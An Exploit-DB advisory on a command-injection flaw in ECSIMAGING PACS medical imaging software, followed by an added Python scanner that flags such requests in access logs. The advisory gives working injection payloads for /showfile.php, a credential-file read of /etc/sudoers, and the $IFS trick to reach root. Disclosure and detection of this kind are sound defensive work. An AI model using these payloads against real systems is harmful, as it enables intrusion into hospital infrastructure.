ECSIMAGING PACS 6.21.5 – Remote code execution

  • Author: shoxxdj
    Date: 2021-01-07
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/49388/
  • # Exploit Title: ECSIMAGING PACS 6.21.5 - Remote code execution
    # Date: 06/01/2021
    # Exploit Author: shoxxdj
    # Vendor Homepage: https://www.medicalexpo.fr/
    # Version: 6.21.5 and below (tested on 6.21.5, 6.21.3)
    # Tested on: Linux
    
    The ECSIMAGING PACS application, version 6.21.5 and below, suffers from an OS command injection vulnerability.
    The "file" parameter of the /showfile.php page can be exploited with simple OS command injection to gain root access.
    Root access follows because the www-data user has sudo NOPASSWD access, as shown by reading the sudoers file through the same parameter:
    
    /showfile.php?file=/etc/sudoers
    [...]
    www-data ALL=NOPASSWD: ALL
    [...]
    
    Command injection can be achieved with the $IFS trick, in which $IFS stands in for spaces: <url>/showfile.php?file=;ls$IFS-la$IFS/
    
    /showfile.php?file=;sudo$IFS-l
    [...]
    User www-data may run the following commands on this host:
    (root) NOPASSWD: ALL
    [...]
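
A defender-side check for the requests shown above, as an added example that is not part of the original advisory: it scans web-server access-log lines for /showfile.php requests whose "file" parameter carries shell metacharacters or $IFS, or reads a path under /etc/. The combined log format, the sample lines and the sensitive-path rule are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Command separators, substitution, and $IFS / ${IFS} (the space substitute
# used in the advisory's requests): none belong in a file path.
SHELL_META = re.compile(r"[;|&`\r\n]|\$\(|\$\{?IFS\b")
# Assumption: reads under /etc/ or with ".." are not legitimate for this page.
SENSITIVE = re.compile(r"^/etc/|(^|/)\.\.(/|$)")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def file_values(target):
    """Decoded 'file' parameter values of a /showfile.php request target."""
    parts = urlsplit(target)
    if not parts.path.endswith("/showfile.php"):
        return []
    values = []
    # Split by hand: some parse_qs versions also treat ';' as a separator,
    # which would hide the injected part from the check.
    for pair in parts.query.split("&"):
        name, _, value = pair.partition("=")
        if unquote_plus(name) == "file":
            values.append(unquote_plus(value))
    return values

def classify(log_line):
    """Return 'injection', 'sensitive-read' or None for one access-log line."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    verdict = None
    for value in file_values(match.group(1)):
        if SHELL_META.search(value):
            return "injection"
        if SENSITIVE.search(value):
            verdict = "sensitive-read"
    return verdict

# Constructed sample lines (combined log format, documentation addresses).
SAMPLE = [
    '192.0.2.10 - - [07/Jan/2021:10:00:01 +0000] "GET /showfile.php?file=report_1234.pdf HTTP/1.1" 200 5120',
    '192.0.2.44 - - [07/Jan/2021:10:02:13 +0000] "GET /showfile.php?file=/etc/sudoers HTTP/1.1" 200 3174',
    '192.0.2.44 - - [07/Jan/2021:10:02:40 +0000] "GET /showfile.php?file=;sudo$IFS-l HTTP/1.1" 200 211',
    '192.0.2.44 - - [07/Jan/2021:10:03:02 +0000] "GET /showfile.php?file=%3Bls%24IFS-la%24IFS/ HTTP/1.1" 200 980',
    '192.0.2.10 - - [07/Jan/2021:10:05:00 +0000] "GET /index.php?file=;x HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(classify(line) or "ok", "|", line)
```

Percent-encoded variants are decoded before matching, so `%3B` and `%24IFS` are caught the same way as the literal forms.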